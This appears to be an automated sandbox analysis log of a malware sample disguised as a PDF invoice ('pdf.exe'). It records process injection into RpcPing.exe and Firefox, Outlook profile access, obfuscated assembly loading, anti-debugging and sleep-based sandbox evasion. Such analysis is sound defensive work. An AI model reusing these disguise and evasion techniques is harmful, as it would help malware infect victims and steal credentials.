Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: credui.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Data Obfuscation

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.3682450.2.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.6b70000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.366a230.1.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 8.2.RpcPing.exe.40bcd14.2.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.2.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.0.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 10.2.firefox.exe.31d5cd14.0.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: 0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E9DED push FFFFFF8Bh; iretd 0_2_070E9DEF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040D0CA push edi; ret 3_2_0040D0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416166 pushfd ; iretd 3_2_004161E5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417984 push esp; iretd 3_2_0041798A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B46 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B62 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00408307 push ds; iretd 3_2_00408309
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00403330 push eax; ret 3_2_00403332
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C40 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C43 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00404D23 push esi; retf 3_2_00404D24
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413E4A push edi; retf 3_2_00413E4B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413F1C push eax; ret 3_2_00413F26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417FD0 push esp; ret 3_2_00417FD1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004187E8 push ebx; ret 3_2_004187E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E225F pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E27FA pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A109AD push ecx; mov dword ptr [esp], ecx 3_2_01A109B6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E283D push eax; iretd 3_2_019E2858
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E1368 push eax; iretd 3_2_019E1369
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7E push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7B push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F1242 push ds; iretd 7_2_036F1244
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6005 push edi; ret 7_2_036F6007
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF0A1 pushfd ; iretd 7_2_036FF120
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_037008BF push esp; iretd 7_2_037008C5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701723 push ebx; ret 7_2_03701724
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03700F0B push esp; ret 7_2_03700F0C
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701C14 push cs; retf 7_2_03701C15
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E225F pushad ; ret 8_2_039E27F9
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_039E27FA pushad ; ret 8_2_039E27F9
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: section name: .text entropy: 7.754463700440127

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.exe Static PE information: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\RpcPing.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: ORIGINAL INVOICE COAU7230734298.pdf.exe PID: 7276, type: MEMORYSTR
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\RpcPing.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: C50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: 2640000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: 7A70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: 8A70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: 8C40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: 9C40000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: 9FD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: AFD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Memory allocated: BFD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A5096E rdtsc 3_2_01A5096E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\RpcPing.exe Window / User API: threadDelayed 9836
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\RpcPing.exe API coverage: 2.6 %
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe TID: 7296 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020 Thread sleep count: 136 > 30
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020 Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020 Thread sleep count: 9836 > 30
Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8020 Thread sleep time: -19672000s >= -30000s
Source: C:\Windows\SysWOW64\RpcPing.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose, 8_2_0327C000
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003372000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000009.00000002.2930419434.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2544629765.000001DEF1D4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\RpcPing.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004172F3 LdrLoadDll, 3_2_004172F3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A50185 mov eax, dword ptr fs:[00000030h] 3_2_01A50185
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ACC188 mov eax, dword ptr fs:[00000030h] 3_2_01ACC188
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AB4180 mov eax, dword ptr fs:[00000030h] 3_2_01AB4180
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A9019F mov eax, dword ptr fs:[00000030h] 3_2_01A9019F
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A0A197 mov eax, dword ptr fs:[00000030h] 3_2_01A0A197
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE61E5 mov eax, dword ptr fs:[00000030h] 3_2_01AE61E5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A401F8 mov eax, dword ptr fs:[00000030h] 3_2_01A401F8
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD61C3 mov eax, dword ptr fs:[00000030h] 3_2_01AD61C3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD61C3 mov eax, dword ptr fs:[00000030h] 3_2_01AD61C3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h] 3_2_01A8E1D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h] 3_2_01A8E1D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8E1D0 mov ecx, dword ptr fs:[00000030h] 3_2_01A8E1D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h] 3_2_01A8E1D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A8E1D0 mov eax, dword ptr fs:[00000030h] 3_2_01A8E1D0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A40124 mov eax, dword ptr fs:[00000030h] 3_2_01A40124
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov eax, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABE10E mov ecx, dword ptr fs:[00000030h] 3_2_01ABE10E
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABA118 mov ecx, dword ptr fs:[00000030h] 3_2_01ABA118
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABA118 mov eax, dword ptr fs:[00000030h] 3_2_01ABA118
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABA118 mov eax, dword ptr fs:[00000030h] 3_2_01ABA118
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01ABA118 mov eax, dword ptr fs:[00000030h] 3_2_01ABA118
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AD0115 mov eax, dword ptr fs:[00000030h] 3_2_01AD0115
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE4164 mov eax, dword ptr fs:[00000030h] 3_2_01AE4164
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AE4164 mov eax, dword ptr fs:[00000030h] 3_2_01AE4164
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h] 3_2_01AA4144
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h] 3_2_01AA4144
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA4144 mov ecx, dword ptr fs:[00000030h] 3_2_01AA4144
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h] 3_2_01AA4144
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA4144 mov eax, dword ptr fs:[00000030h] 3_2_01AA4144
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01AA8158 mov eax, dword ptr fs:[00000030h] 3_2_01AA8158
